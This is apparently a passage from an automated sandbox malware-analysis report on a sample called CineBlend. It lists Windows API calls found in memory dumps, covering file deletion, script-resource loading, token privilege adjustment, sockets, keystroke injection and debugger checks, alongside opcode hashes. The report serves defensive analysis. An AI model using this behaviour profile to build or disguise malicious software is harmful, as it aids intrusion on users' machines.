                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                          • String ID:
                                          • API String ID: 540024437-0
                                          • Opcode ID: 3deb8c5b748f570b93012224a2dddc540467c36f464b002289c78beefce791da
                                          • Instruction ID: 20ce64ba90a2b4b7341fe8137c2557ffd688bbd06f01c79a872904e815bccaad
                                          • Opcode Fuzzy Hash: 3deb8c5b748f570b93012224a2dddc540467c36f464b002289c78beefce791da
                                          • Instruction Fuzzy Hash: A1414B31A00100AFD710DF28C494B6ABBE5EB46318F1885DDE8569F293C771ED81DBE1
                                          APIs
                                          • _free.LIBCMT ref: 00B7BD54
                                          • _free.LIBCMT ref: 00B7BD78
                                          • _free.LIBCMT ref: 00B7BEFF
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE46D0), ref: 00B7BF11
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00C1221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B7BF89
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00C12270,000000FF,?,0000003F,00000000,?), ref: 00B7BFB6
                                          • _free.LIBCMT ref: 00B7C0CB
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: a91272cf12d24c7ffe5f03373f8579fef5fb9ac435418c30d16a2f75ce99bb42
                                          • Instruction ID: c96a069c59492d5b5e4c2e4221bb3d30d7c81be57dd56aef6eadf2a82e76a515
                                          • Opcode Fuzzy Hash: a91272cf12d24c7ffe5f03373f8579fef5fb9ac435418c30d16a2f75ce99bb42
                                          • Instruction Fuzzy Hash: F3C1E6759002059FDB249F689C41FEEBBF9EF42320F14C5EAE5A99B291E7308E418F50
                                          APIs
                                            • Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871
                                            • Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BADCCB
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BADD1B
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BADD2C
                                          • FindClose.KERNEL32(00000000), ref: 00BADD43
                                          • FindClose.KERNEL32(00000000), ref: 00BADD4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: 18ed141249e6b5c8ee33415ca15c79abec2fb3bbf2127d19740d67c82420e055
                                          • Instruction ID: 9c5040c571c95493e2fb9598866a219ba07c2c4dcf7cc56f561c927ec7bb8a3f
                                          • Opcode Fuzzy Hash: 18ed141249e6b5c8ee33415ca15c79abec2fb3bbf2127d19740d67c82420e055
                                          • Instruction Fuzzy Hash: 9E316C3100D345ABC305EF64C8958AFB7E8BE96310F404EADF5E693191EB21DA09DB63
                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B856C2,?,?,00000000,00000000), ref: 00BB3A1E
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B856C2,?,?,00000000,00000000), ref: 00BB3A35
                                          • LoadResource.KERNEL32(?,00000000,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE), ref: 00BB3A45
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE), ref: 00BB3A56
                                          • LockResource.KERNEL32(00B856C2,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE,?), ref: 00BB3A65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: ecf7d375fe893d509ac0e4dc5e5e017f381076a236ba178551fb073332b70575
                                          • Instruction ID: 3681c44fd6f046485947ef30c75ec38797af8fb7c6847bcf6359b901bf082a2d
                                          • Opcode Fuzzy Hash: ecf7d375fe893d509ac0e4dc5e5e017f381076a236ba178551fb073332b70575
                                          • Instruction Fuzzy Hash: D8113C71201701BFD7218B65DC58F6BBBFDEBC5B51F2442ADB48297190EBB1E9058A30
                                          APIs
                                            • Part of subcall function 00BA1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA1916
                                            • Part of subcall function 00BA1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA1922
                                            • Part of subcall function 00BA1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA1931
                                            • Part of subcall function 00BA1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA1938
                                            • Part of subcall function 00BA1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA194E
                                          • GetLengthSid.ADVAPI32(?,00000000,00BA1C81), ref: 00BA20FB
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA2107
                                          • HeapAlloc.KERNEL32(00000000), ref: 00BA210E
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA2127
                                          • GetProcessHeap.KERNEL32(00000000,00000000,00BA1C81), ref: 00BA213B
                                          • HeapFree.KERNEL32(00000000), ref: 00BA2142
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: aab7cd8d399e419bdc88b3a31dcccde2dcdc9d1e1d603c7a9c140812965f1602
                                          • Instruction ID: 4459d9893c725903df467a0149bc7c05e34022dcc6b6ff968d99e0f4d242aa50
                                          • Opcode Fuzzy Hash: aab7cd8d399e419bdc88b3a31dcccde2dcdc9d1e1d603c7a9c140812965f1602
                                          • Instruction Fuzzy Hash: 1711D071605205FFDB109F68CC19FAFBBB9EF46356F148099EA81A7120DB359941CB60
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00BBA5BD
                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00BBA6D0
                                            • Part of subcall function 00BB42B9: GetInputState.USER32 ref: 00BB4310
                                            • Part of subcall function 00BB42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB43AB
                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00BBA5ED
                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00BBA6BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                          • String ID: *.*
                                          • API String ID: 1972594611-438819550
                                          • Opcode ID: 6c38ab7b3a959e9e9deb50705f66556b11d8dbe559e34ebfed6b46b2d560544b
                                          • Instruction ID: c4b0436cf52ce42a277be109b8a49b796546d2c40794ec9e9a07d4dd5894ecf6
                                          • Opcode Fuzzy Hash: 6c38ab7b3a959e9e9deb50705f66556b11d8dbe559e34ebfed6b46b2d560544b
                                          • Instruction Fuzzy Hash: 3E4130B1D0120AAFCF15DFA4C84AAEEBBF4EF15310F144096E945A21A1EB719F44DF61
                                          APIs
                                          • DefDlgProcW.USER32(?,?), ref: 00B4233E
                                          • GetSysColor.USER32(0000000F), ref: 00B42421
                                          • SetBkColor.GDI32(?,00000000), ref: 00B42434
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Color$Proc
                                          • String ID:
                                          • API String ID: 929743424-0
                                          • Opcode ID: 144d968de89cfc9e001c8ce18c2e1d06794895ca12ff9531f1ae820ac86608a3
                                          • Instruction ID: adb5196cc72e2ccc2e3dd415c5cf0128d5adf1f60f3eaf9d6b96ea3d4598c45f
                                          • Opcode Fuzzy Hash: 144d968de89cfc9e001c8ce18c2e1d06794895ca12ff9531f1ae820ac86608a3
                                          • Instruction Fuzzy Hash: 7D81F2B0114410BEE6297B2C8CD8E7F29EEEB42B04F5501DAF502C66A5D959CF42F37A
                                          APIs
                                            • Part of subcall function 00BC3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
                                            • Part of subcall function 00BC3AAB: _wcslen.LIBCMT ref: 00BC3AF8
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BC22BA
                                          • WSAGetLastError.WSOCK32 ref: 00BC22E1
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00BC2338
                                          • WSAGetLastError.WSOCK32 ref: 00BC2343
                                          • closesocket.WSOCK32(00000000), ref: 00BC2372
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 1601658205-0
                                          • Opcode ID: 578f32622039b22317b92c59b75bcf1b8fd11e177430f0bfb7f59cfd2a10401c
                                          • Instruction ID: 34de8d55056887dd621687ea2599ffab5ec85f54d78cfd4e7c52e5539acefdc5
                                          • Opcode Fuzzy Hash: 578f32622039b22317b92c59b75bcf1b8fd11e177430f0bfb7f59cfd2a10401c
                                          • Instruction Fuzzy Hash: 1E51BE75A00200AFE710AF24C886F2A77E5EB45714F0884DCF9459F383DB71AD429BA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 9ed925f177201fc3af6a0371ddb580f37dfc202fe78393d2f5daf5f23f172845
                                          • Instruction ID: e5d1d133b1db9e155a89bd9b31c70def8d54b8f09ecb0bfe45f30d1e17821ff2
                                          • Opcode Fuzzy Hash: 9ed925f177201fc3af6a0371ddb580f37dfc202fe78393d2f5daf5f23f172845
                                          • Instruction Fuzzy Hash: E32127317012408FE7219F26D844B1AFBE4FFA5314F1980AEE8498B351EB71DD42CB90
                                          APIs
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00BBD8CE
                                          • GetLastError.KERNEL32(?,00000000), ref: 00BBD92F
                                          • SetEvent.KERNEL32(?,?,00000000), ref: 00BBD943
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorEventFileInternetLastRead
                                          • String ID:
                                          • API String ID: 234945975-0
                                          • Opcode ID: d8bfe4c9c95ba7abb86bfe28a41cd4d04bc1c1506272e2fa18884e1330d129ff
                                          • Instruction ID: 7aa9c4224a8865783d0057aab2ab524ad5a77bc8fefdf2bb3cea458b7153d528
                                          • Opcode Fuzzy Hash: d8bfe4c9c95ba7abb86bfe28a41cd4d04bc1c1506272e2fa18884e1330d129ff
                                          • Instruction Fuzzy Hash: 8A2190B5900705EFE7309F65CC88BAAB7F8EF40314F1044AAE68692151FBB8EA04DB50
                                          APIs
                                          • lstrlenW.KERNEL32(?,00B846AC), ref: 00BAE482
                                          • GetFileAttributesW.KERNEL32(?), ref: 00BAE491
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BAE4A2
                                          • FindClose.KERNEL32(00000000), ref: 00BAE4AE
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                          • String ID:
                                          • API String ID: 2695905019-0
                                          • Opcode ID: d60081f92283408d6da45b2a6251dd20d61cca9b004ecdc3b0fe2e89a8afd73a
                                          • Instruction ID: d882198f74e6783e4b53511ecaee0d5d576c53e53f856e0a7b84427370c8c2c4
                                          • Opcode Fuzzy Hash: d60081f92283408d6da45b2a6251dd20d61cca9b004ecdc3b0fe2e89a8afd73a
                                          • Instruction Fuzzy Hash: 49F0A030419A205792106B38EC0D8AEB7ADEE07335B504B92F8B6C22E0EF78D9958695
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: %.3d$X64
                                          • API String ID: 481472006-1077770165
                                          • Opcode ID: 5bc5361b396abbc7ae1a43da5a44ce56372a83a9fcb6cf04271c220d8ca46e13
                                          • Instruction ID: 1c48170ef447b879645c422b59bc50550bb33efe0f02f191c4dee5c746277910
                                          • Opcode Fuzzy Hash: 5bc5361b396abbc7ae1a43da5a44ce56372a83a9fcb6cf04271c220d8ca46e13
                                          • Instruction Fuzzy Hash: 5ED012B1C04108D6DF80DB90DDC9DB9B3FCBB18701F1084F2F95691040FA20D9089B21
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B72A8A
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B72A94
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B72AA1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 5d267988710f0a686a7122249a026f109a8fdd6fe4f633c7b952b9185f9f7dfd
                                          • Instruction ID: 13ac0f8345b5b09cb2d726584f26493f8a1cfdb77706617011565cbcacbec08d
                                          • Opcode Fuzzy Hash: 5d267988710f0a686a7122249a026f109a8fdd6fe4f633c7b952b9185f9f7dfd
                                          • Instruction Fuzzy Hash: FF31B7759012189BCB21DF68D98979DBBF8AF18310F5042EAE81CA7251E7349F858F45
                                          APIs
                                            • Part of subcall function 00B6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B609D8
                                            • Part of subcall function 00B6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B609F5
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
                                          • GetLastError.KERNEL32 ref: 00BA2097
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                          • String ID:
                                          • API String ID: 577356006-0
                                          • Opcode ID: db331141a8da8668562b6d3cfd10da0537606a476c4c15d22832bb9a4a8e118e
                                          • Instruction ID: 4abf694a424a0a1e894fc7bfd5e1091735d34cdfeb09dc478c2df07afe1d7659
                                          • Opcode Fuzzy Hash: db331141a8da8668562b6d3cfd10da0537606a476c4c15d22832bb9a4a8e118e
                                          • Instruction Fuzzy Hash: D911C1B2414705AFD728AF54DCC6D6BB7F8EB45710B20845EF04653251EB70BC41CA24
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00B9E664
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID: X64
                                          • API String ID: 2645101109-893830106
                                          • Opcode ID: 8bc19ecfcae344d8a7a41e7543db11ffd691747a7c9a425f4a2fe4c46e0dd930
                                          • Instruction ID: 9236f112101134e3996b8d206697f56a05651defdd2c2e362782a60f8403bb04
                                          • Opcode Fuzzy Hash: 8bc19ecfcae344d8a7a41e7543db11ffd691747a7c9a425f4a2fe4c46e0dd930
                                          • Instruction Fuzzy Hash: B4D0C9F480111DEADF80CB50ECC8EDDB3BCBB04304F1006A2F546A2100DB3096488B10
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BC52EE,?,?,00000035,?), ref: 00BB4229
                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BC52EE,?,?,00000035,?), ref: 00BB4239
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 5ff3e30eb86f5ff5a155e805d00e6ed1a3a1cd645c06b9477e8fc82628db6ffe
                                          • Instruction ID: a491c88ab17b70ec024ffe010fe26b7b0def1e989a7a955e37577e345ecf1883
                                          • Opcode Fuzzy Hash: 5ff3e30eb86f5ff5a155e805d00e6ed1a3a1cd645c06b9477e8fc82628db6ffe
                                          • Instruction Fuzzy Hash: 4BF0A0306002286AE7202A66AC4DFEBB6ADEF85761F0001A6B505D3181DA609A00D6B1
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BABC24
                                          • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00BABC37
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
